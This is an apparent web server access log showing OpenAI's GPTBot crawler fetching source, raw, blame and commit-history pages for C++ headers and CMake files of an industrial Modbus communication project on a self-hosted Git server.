"https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Hero.tsx" +[17/Feb/2026:15:34:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/components/Hero.tsx" +[17/Feb/2026:15:34:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 12361] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:34:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 12012] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:35:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" [Client 74.7.227.38] [Length 12944] [Gzip 3.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:15:35:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/old_controller.hpp" [Client 74.7.227.38] [Length 13472] [Gzip 4.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:35:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/transport.hpp" [Client 74.7.227.38] [Length 12750] [Gzip 3.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:35:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11167] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:15:35:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 12845] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:35:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 13132] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:35:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 11611] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:35:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 12758] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:35:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 12254] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:35:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:15:35:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 558] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:15:35:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" +[17/Feb/2026:15:35:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" [Client 74.7.227.38] [Length 12638] [Gzip 6.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" +[17/Feb/2026:15:35:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/transport.hpp" [Client 74.7.227.38] [Length 9929] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/transport.hpp" +[17/Feb/2026:15:35:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:15:35:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 10240] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:15:35:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10084] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:15:35:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 9934] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:15:35:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 10435] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:15:35:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 9929] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:15:35:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 789] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:15:35:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/old_controller.hpp" [Client 74.7.227.38] [Length 9930] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/old_controller.hpp" +[17/Feb/2026:15:35:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/old_controller.hpp" [Client 74.7.227.38] [Length 13486] [Gzip 7.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/old_controller.hpp" +[17/Feb/2026:15:35:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/transport.hpp" [Client 74.7.227.38] [Length 1379] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/transport.hpp" +[17/Feb/2026:15:35:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/old_controller.hpp" [Client 74.7.227.38] [Length 2227] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/old_controller.hpp" +[17/Feb/2026:15:35:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 11314] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:15:35:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:15:35:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 1182] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:15:35:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/transport.hpp" [Client 74.7.227.38] [Length 12304] [Gzip 5.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/transport.hpp" +[17/Feb/2026:15:35:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" [Client 74.7.227.38] [Length 2115] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" +[17/Feb/2026:15:35:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 1611] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:15:35:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 10729] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:15:35:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 322] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:15:35:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 12776] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:35:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 12016] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:35:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 12362] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:35:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 11567] [Gzip 4.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:15:35:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 12847] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:35:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 11610] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:35:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 13131] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:35:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 666] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:15:35:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 13132] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:35:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 1143] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:15:35:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 13131] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:35:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 10171] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:15:35:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 1643] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:15:35:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr 